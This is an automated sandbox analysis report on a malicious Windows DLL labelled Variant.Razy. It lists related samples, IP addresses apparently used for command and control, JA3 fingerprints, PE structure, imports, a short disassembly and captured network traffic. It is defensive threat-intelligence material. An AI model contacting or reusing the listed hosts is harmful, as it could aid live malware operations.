                                                                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      KELIWEBITSecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                      • 185.56.219.47
                                                                                                      AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                      • 45.77.0.96

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                      Category:dropped
                                                                                                      Size (bytes):61157
                                                                                                      Entropy (8bit):7.995991509218449
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                      MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                      SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                      SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                      SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):326
                                                                                                      Entropy (8bit):3.096153500626319
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKZAYjkOdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:fYg2kPlE99SNxAhUefit
                                                                                                      MD5:AE9C1497AD775F8E1A863D31E8490870
                                                                                                      SHA1:E71E829F6EE22010296598737805B80AAA819546
                                                                                                      SHA-256:A25311C88718A1479AB2D386352F28023175E938C99FA7EED2C6417FC946C841
                                                                                                      SHA-512:A9F9EDC77347A22149BBDA0AEA60AF083580FC461E6CF0286FFE261A5C92C453646A1CA449DC6C18CA0C590B20A2CAE918510DEEA90A1C9DBB7BCB1AB0690506
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: p...... ........W..}....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.439588310060896
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:SecuriteInfo.com.Variant.Razy.980776.31954.dll
                                                                                                      File size:1375232
                                                                                                      MD5:b550657c2ac0bf9940617b669d6870b1
                                                                                                      SHA1:2071b204899736be74379f1197b13700e6de3a09
                                                                                                      SHA256:e3244d67b76615adcc86f39f00f49ae345e18f2e9136f5305a438a4a6601e7e9
                                                                                                      SHA512:c2ccaa663b96961b4fb05aa54da4677fdaccd3210e9bcd9b664fda953343faebbe6c64c00bccac4c2889e25561af6f83e384ce136dd357446552d2f0851cc18f
                                                                                                      SSDEEP:24576:unxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7X:ucfk82uAJTI7/PswKwuy
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............U...U...Us..U...U..kU...U...T...U...T...U...T...U...T...Us..U...U...U...U...TB..U...T...U...U...U...T...URich...U.......

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4336b0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x5BBD4949 [Wed Oct 10 00:35:21 2018 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                      jne 00007F351CA40DC7h
                                                                                                      call 00007F351CA41AF7h
                                                                                                      mov eax, dword ptr [ebp+10h]
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      push ecx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      push edx
                                                                                                      call 00007F351CA40BB6h
                                                                                                      add esp, 0Ch
                                                                                                      pop ebp
                                                                                                      retn 000Ch
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      push edx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      xor edx, dword ptr [0054806Ch]
                                                                                                      push edx
                                                                                                      call 00007F351CA40E04h
                                                                                                      add esp, 08h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      mov eax, 00000020h
                                                                                                      sub eax, edx
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                                      push ecx
                                                                                                      call 00007F351CA40DD3h
                                                                                                      add esp, 08h
                                                                                                      xor eax, dword ptr [0054806Ch]
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      ror eax, cl
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      call 00007F351CA4215Dh
                                                                                                      push eax
                                                                                                      call 00007F351CA82E67h
                                                                                                      add esp, 04h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 18h
                                                                                                      mov eax, dword ptr [ebp+00h]

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xc5e2f0xc6000False0.442064689867data6.47811726629IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xc70000x80aec0x80c00False0.534101941748data5.52047670765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Bluewing10x49eed0
                                                                                                      Earth20x49efd0
                                                                                                      Masterjust30x49eb20

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      10/28/21-05:03:10.806424ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 28, 2021 05:01:44.087369919 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:44.087419987 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:44.087522030 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:44.116173983 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:44.116192102 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:44.647489071 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:44.647696018 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:45.689238071 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:45.689260960 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:45.689519882 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:45.689594984 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:45.693651915 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:45.693783045 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:45.693808079 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:46.399646997 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:46.399750948 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:46.399775028 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:46.399802923 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:46.417988062 CEST49759443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:46.418032885 CEST44349759192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:46.556768894 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:46.719680071 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:46.719784975 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:46.720511913 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:46.883315086 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:46.884949923 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:46.885025978 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:48.436345100 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:48.600521088 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:48.600560904 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:48.600696087 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:48.601466894 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:48.601701021 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:48.764169931 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:48.764262915 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:48.764281988 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:48.764297009 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:48.904093027 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:48.904139042 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:48.904407024 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:48.931663990 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:48.931691885 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:49.151288986 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:49.151319027 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:49.151415110 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:49.151443958 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:49.158412933 CEST49761808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:49.321264029 CEST80849761143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:49.446500063 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:49.446619987 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:49.780715942 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:49.780756950 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:49.781033993 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:49.781126022 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:49.837546110 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:49.837656975 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:49.837717056 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:50.248191118 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:50.413465023 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:50.413647890 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:50.547053099 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:50.547122002 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:50.547205925 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:50.547224998 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:50.929837942 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:50.933140993 CEST49774443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:01:50.933198929 CEST44349774192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.095568895 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.096302032 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.096386909 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:51.117490053 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:51.138277054 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:51.283150911 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.283240080 CEST497766891192.168.2.445.77.0.96
